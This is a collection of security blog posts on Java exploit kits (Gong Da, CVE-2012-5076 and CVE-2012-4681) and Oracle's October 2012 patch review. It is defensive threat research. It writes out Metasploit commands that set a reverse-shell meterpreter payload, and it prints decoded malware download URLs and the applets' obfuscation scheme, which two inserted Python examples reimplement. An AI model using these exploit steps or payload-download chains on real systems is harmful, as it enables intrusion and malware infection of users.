Tag Archives: Java

Gong Da / Gondad Exploit Pack Add Java CVE-2012-5076 support

You may have read my first blog post regarding the evolution of the Gong Da exploit kit, which has grown into a more complex EK by supporting most of the latest Oracle Java vulnerabilities: CVE-2011-3544 (Oracle Java Rhino exploit), CVE-2012-4681 (Oracle Java August 0day), CVE-2012-0507 (another Oracle Java exploit), CVE-2012-1723 (another Oracle Java exploit) and CVE-2012-1889 (Microsoft XML Core Services). Some previous versions of Gong Da EK also supported CVE-2011-2140 (Adobe Flash Player) and CVE-2012-0003 (Windows Media), but it seems that the new version no longer uses them.

After Cool EK and BlackHole EK, Gong Da EK has integrated exploitation of the Java vulnerability CVE-2012-5076 (Java Applet JAX-WS). This vulnerability, patched in Oracle Java 7 Update 9, affects all versions of Oracle Java from 7 up to 7 Update 7.

This new version was discovered on “hxxp://rdp.nhgdeerw.com/rdp/index.html”, a web site that is still online at the time of writing.

“rdp.nhgdeerw.com” is hosted on 173.208.189.170 (AS32097) in the US, and the “wangmazz.com” domain name was created on 2012-11-17 through the name.com registrar for “tao we ([email protected])”.

The “index.html” file, containing JavaScript code obfuscated by “JSXX VIP JS Obfuscator”, is detected by only 8 of 44 anti-virus engines on VirusTotal.com.

/*Encrypt By ndtw.wmdottw.com’s JSXX 0.44 VIP*/

After de-obfuscating the “index.html” file you can see that Gong Da Pack has evolved into the following diagram.

Below is some information regarding the different files:

  • MWCxT0.jpg (aka CVE-2012-5076) : 2/44 on VirusTotal.com
  • aWxsX0.jpg (aka CVE-2011-3544) : 7/44 on VirusTotal.com
  • kCyrwe1.jpg (aka CVE-2012-0507) : 10/44 on VirusTotal.com
  • RQnRD3.jpg (aka CVE-2012-1723) : 21/44 on VirusTotal.com
  • pujF8.jpg (aka CVE-2012-4681) : 28/44 on VirusTotal.com

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Timeline :

Vulnerability patched by Oracle in the October 2012 CPU
Vulnerability discovered being exploited in the wild by @kafeine on 2012-11-09
Metasploit PoC provided by juan vazquez on 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

Funny and Efficient Anti-Virus Bypass Packed Java Applets Exploits CVE-2012-4681 in the Wild

On 24 October, during my regular malware monitoring hobby, I observed a suspicious infected server in Taiwan (www.gvrb.com.tw) which is still online at the time of writing. The home page of the server loads a first Java applet from a JAR file “Java.jar” and a second Java applet as a single class file “eiAD.class”.

VirusTotal analysis of “Java.jar” (2990711e7cd04553260a6fbccf8ea6a6) reported 5/43 detections as Java/Downloader, and analysis of “eiAD.class” (8d4ddd1e1f41a2e8e18da097ecafecbc) reported 5/44 detections as a CVE-2012-4681 Oracle Java Gondvv exploit. The detection rate is really low, so a deeper analysis of these elements is worthwhile.

Thanks to @_sinn3r, @binjo, @jjarmoc and @maxime_tz for all their advice.

“Java.jar” (pastebin source code) JAR Java/Downloader analysis

This JAR file contains a Manifest file which reveals that the file was compiled with “Java 1.6.0_29 (Sun Microsystems Inc.)”, and the JAR file is signed with an RSA signature.

You can see that this self-signed certificate was created on 16 October and pretends to be generated and issued by Microsoft. By signing an applet, the restrictions on the applet are mostly removed: signing basically means that the applet writer is vouching that the applet is safe. The user of a signed applet can accept it and have it run without most restrictions, or reject it and not have it run at all. A self-signed applet triggers a security warning pop-up advising you of the associated risks. A similar self-signed Java applet could be generated with the java_signed_applet Metasploit exploit module.
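A static triage routine for a JAR laid out like the one described above, added here as an example (not code from the post or from the samples): it reads the manifest's Created-By attribute, reports whether signature block files are present in META-INF, and lists the classes. The JAR it inspects is constructed inside the script and its signature block is a placeholder, so the actual signer and self-signed checks still need jarsigner -verify -certs.

```python
import io
import zipfile

def build_sample_jar(signed: bool = True) -> bytes:
    """Constructed JAR mimicking the layout described above (not the real Java.jar):
    a manifest with a Created-By attribute, an optional SF/RSA pair, one applet class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\n"
                    "Created-By: 1.6.0_29 (Sun Microsystems Inc.)\r\n"
                    "\r\n"
                    "Name: Java.class\r\n"
                    "SHA1-Digest: AAAAAAAAAAAAAAAAAAAAAAAAAAA=\r\n\r\n")
        if signed:
            zf.writestr("META-INF/SIGNER.SF", "Signature-Version: 1.0\r\n")
            zf.writestr("META-INF/SIGNER.RSA", b"\x30\x82placeholder-pkcs7")  # not a real PKCS#7 blob
        zf.writestr("Java.class", b"\xca\xfe\xba\xbe" + b"\x00" * 16)
    return buf.getvalue()

def parse_manifest_main(text: str) -> dict:
    """Main-section attributes (up to the first blank line), joining continuation lines."""
    attrs, last = {}, None
    for line in text.splitlines():
        if not line.strip():
            break
        if line.startswith(" ") and last:          # continuation of the previous attribute
            attrs[last] += line[1:]
            continue
        key, _, value = line.partition(":")
        last = key.strip()
        attrs[last] = value.strip()
    return attrs

def triage_jar(data: bytes) -> dict:
    """Static triage: build toolchain, signature block presence, class inventory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        manifest = parse_manifest_main(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
    blocks = [n for n in names
              if n.upper().startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))]
    return {
        "created_by": manifest.get("Created-By", ""),
        "signed": bool(blocks),
        "signature_blocks": blocks,
        "classes": [n for n in names if n.endswith(".class")],
    }
```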

By analyzing the source code of “Java.jar” we can see interesting arrays and functions.

“FCKME” is an array in which a space represents a new entry. The authors don't seem to like ESET, the anti-virus vendor behind NOD32 🙂

An encoded string is present and is decoded by the adjacent “FJKOKL” function. You can see that entry 29 of the “FCKME” array is used to complete the decoded text.

This function removes all “[>|<]” characters from the encoded text, with the following result:

“687474703a2f2f7777772e677672622e636f6d2e74772f75706c6f61642f757365722f66696c65732f6e756d”.

The string is hex-encoded; after decoding it and appending “FCKME[29]”, which is “.exe”, you get the following result:

“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file no longer exists)

The following table provides all values of the “FCKME” array.

With all these values we are able to decode every “FCKME” reference used in the “Java.jar” code.

As you can see, Java.jar is only a self-signed Java downloader. Finally, as pointed out by @_sinn3r, this applet is most likely used as a plan B if eiAD.class is not triggered.

“eiAD.class” (pastebin source code) CVE-2012-4681 Java class file analysis

By analyzing the source code of “eiAD.class” we can see interesting arrays and functions.

This variable seems to be once again a reference to the anti-virus vendor ESET, and especially to its “Foxxy Software Outfoxed” blog post (thanks to @binjo).

An encoded string is present and is decoded by the adjacent “FJKOKL” function, also used in “Java.jar”. A space represents a new entry in the “JFI” array.

“FJKOKL” removes all “[>|<]” characters from the encoded text. The remaining string is hex-encoded, and after decoding you get the following result.

“Nothing like sun. being a awt. Sometimes I put my SunToolkit in my asshole! You see the get is a Field that Name for .exe okay // I mean god damn the get is being set for the Security Manager for file:/ ! Got damn I want some milk from my mommies titz for that acc”.

The following table provides all values of the “JFI” array.

With all these values we are able to decode every “JFI” reference used in the “Java.jar” code.

With all these variables and other functions, the code is able to reconstruct the exploit for the CVE-2012-4681 Oracle Java vulnerability.

Another encoded string is present in “eiAD.class”, and it decodes to the same result as the one in “Java.jar”.

“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file no longer exists)
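The decoding routine described for “FJKOKL” in both Java.jar (the FCKME array) and eiAD.class (the JFI array), reimplemented here as an added example rather than the applet's own code: junk separators are stripped, the remaining hex is decoded, and the array entry at index 29 is appended. The junk pattern “[>|<]” is assumed to be a regex character class, as Java's replaceAll would read it, and both the interleaved input and the array contents are constructed.

```python
import re
import binascii

# Constructed stand-in for the space-separated string array ("FCKME" in Java.jar,
# "JFI" in eiAD.class): 29 filler entries followed by the ".exe" suffix at index 29.
SAMPLE_ARRAY = " ".join(["x%d" % i for i in range(29)] + [".exe"])

# Constructed obfuscated string: the hex from the post with '>', '|' and '<' junk interleaved.
SAMPLE_ENCODED = (
    "68>74|74<70>3a|2f<2f>77|77<77>2e|67<76>72|62<2e>63|6f<6d>2e|74<77>2f|75<70>6c|6f"
    "<61>64|2f<75>73|65<72>2f|66<69>6c|65<73>2f|6e<75>6d"
)

JUNK = re.compile(r"[>|<]")  # assumed to match the applet's replaceAll pattern

def split_array(blob: str) -> list:
    """A space marks a new entry, exactly as described for FCKME and JFI."""
    return blob.split(" ")

def decode_string(encoded: str) -> str:
    """Strip the junk separators, then hex-decode what is left."""
    cleaned = JUNK.sub("", encoded)
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", cleaned):
        raise ValueError("not a clean hex string after stripping junk")
    return binascii.unhexlify(cleaned).decode("latin-1")

def decode_url(encoded: str, array_blob: str, suffix_index: int = 29) -> str:
    """Decoded string completed with array[suffix_index] (".exe" for FCKME[29])."""
    return decode_string(encoded) + split_array(array_blob)[suffix_index]
```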

I found an occurrence of the Author variable in “lEZdLl.class” on pastebin, posted by a Guest on 24 September, which is equivalent to “eiAD.class”.

The “HGIDO” value of “lEZdLl.class” is “http://212.150.101.32/Facebook_msn.exe” (this file no longer exists).

Below is a demonstration video of the effectiveness of these files against anti-virus products.

Oracle Java Critical Patch Update October 2012 Review

Oracle has released its Java Critical Patch Update (CPU) for October 2012 on Tuesday, October 16. This CPU contains 30 security vulnerability fixes and concerns the “Java Runtime Environment” and “JavaFX” components. All 30 security vulnerabilities may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0, and 15 vulnerabilities have a CVSS base score greater than or equal to 7.0.

As you may know, Oracle uses CVSS 2.0 (Common Vulnerability Scoring System) to score the reported vulnerabilities. But as you also may know, security researchers disagree with Oracle's usage of CVSS: Oracle plays with CVSS scores by creating a “Partial+” impact rating which does not exist in CVSS 2.0, and by interpreting the “Complete” rating differently than defined in CVSS 2.0.

Affected products are:

  • JDK and JRE 7 Update 7 and earlier
  • JDK and JRE 6 Update 35 and earlier
  • JDK and JRE 5.0 Update 36 and earlier
  • SDK and JRE 1.4.2_38 and earlier
  • JavaFX 2.2 and earlier

CVSS base scores of the fixed vulnerabilities:

  • 10.0: CVE-2012-5083, CVE-2012-1531, CVE-2012-5086, CVE-2012-5087, CVE-2012-1533, CVE-2012-1532, CVE-2012-5076, CVE-2012-3143, CVE-2012-5088 and CVE-2012-5078
  • 7.6: CVE-2012-5089, CVE-2012-5084 and CVE-2012-5080
  • 7.5: CVE-2012-3159 and CVE-2012-5068
  • 6.4: CVE-2012-4416, CVE-2012-5074 and CVE-2012-5071
  • 5.8: CVE-2012-5069
  • 5.0: CVE-2012-5067, CVE-2012-5070, CVE-2012-5075, CVE-2012-5073, CVE-2012-5079, CVE-2012-5072, CVE-2012-5081 and CVE-2012-5082
  • 2.6: CVE-2012-3216 and CVE-2012-5077
  • 0.0: CVE-2012-5085